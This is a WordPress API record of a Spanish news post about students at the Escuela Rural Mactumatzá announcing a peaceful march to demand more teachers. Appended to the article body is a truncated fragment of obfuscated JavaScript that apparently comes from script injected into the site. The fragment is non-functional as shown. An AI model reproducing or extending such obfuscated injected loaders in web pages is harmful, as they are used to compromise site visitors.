{"id":8201,"date":"2023-01-20T03:57:53","date_gmt":"2023-01-20T03:57:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8201"},"modified":"2023-01-20T03:57:54","modified_gmt":"2023-01-20T03:57:54","slug":"mactumatza-advierte-movilizaciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8201","title":{"rendered":"Mactumatz\u00e1 advierte movilizaciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"479\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-19-at-5.06.50-PM-1.jpeg\" alt=\"\" class=\"wp-image-8202\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-19-at-5.06.50-PM-1.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-19-at-5.06.50-PM-1-300x187.jpeg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mez\/Corresponsalo<br>San Crist\u00f3bal de Las Casas.- Alumnos de la Escuela Rural Mactumatz\u00e1 advirtieron que para este viernes realizar\u00e1n una marcha que partir\u00e1 de sus instalaciones hacia el Parque Central de la capital, Tuxtla Guti\u00e9rrez, debido a que las autoridades educativas no han escuchado su petici\u00f3n de contratar a m\u00e1s docentes y personal administrativo, para el \u00f3ptimo funcionamiento de la escuela.<br>En entrevista v\u00eda telef\u00f3nica, Catalina Villareal, representante de los normalistas, coment\u00f3 que la falta de personal se encuentra afectando su formaci\u00f3n, por lo que pidi\u00f3 una disculpa a la ciudadan\u00eda de las molestias que pudiera causar su movilizaci\u00f3n, que advirti\u00f3 se dar\u00e1 de forma pac\u00edfica, ya que \u00fanicamente quieren las autoridades los atiendan.<br>\u201cEstamos atravesando un problema sobre la contrataci\u00f3n de trabajadores, las autoridades no quieren dar ese apoyo, lo cual nos est\u00e1 afectando acad\u00e9micamente, como alumnos eso nos afecta, porque no hay docentes, necesitamos aprender, as\u00ed no podemos avanzar, necesitamos m\u00e1s trabajadores porque muchos dicen que est\u00e1n laborando en la instituci\u00f3n cuando realmente no es as\u00ed\u201d, coment\u00f3.<br>Asimismo, dijo que necesitan principalmente docentes, adem\u00e1s de personal administrativo y apoyo y en total necesitan a unos 30 trabajadores, \u201chay dos docentes que no nos quieren contratar, el resto son administrativos y por tal motivo nos vamos a manifestar en Tuxtla Guti\u00e9rrez, mediante actividades pac\u00edficas\u201d.<br>\u201cNecesitamos que las autoridades nos den una soluci\u00f3n, realmente es necesario que hayan docentes, vamos a empezar la manifestaci\u00f3n a las 10 de la ma\u00f1ana, vamos a partir de la escuela de Mactumatz\u00e1 al Parque Central, empezaremos con esto y terminando la actividad vamos a determinar qu\u00e9 otras acciones tomaremos\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsaloSan Crist\u00f3bal de Las Casas.- Alumnos de la Escuela Rural Mactumatz\u00e1 advirtieron que para este viernes realizar\u00e1n una marcha que partir\u00e1 de sus instalaciones hacia el Parque Central de la capital, Tuxtla Guti\u00e9rrez, debido a que las autoridades educativas no han escuchado su petici\u00f3n de contratar a m\u00e1s docentes y personal administrativo, para el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8202,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8201","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8201","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8201"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8201\/revisions"}],"predecessor-version":[{"id":8203,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8201\/revisions\/8203"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8202"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8201"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}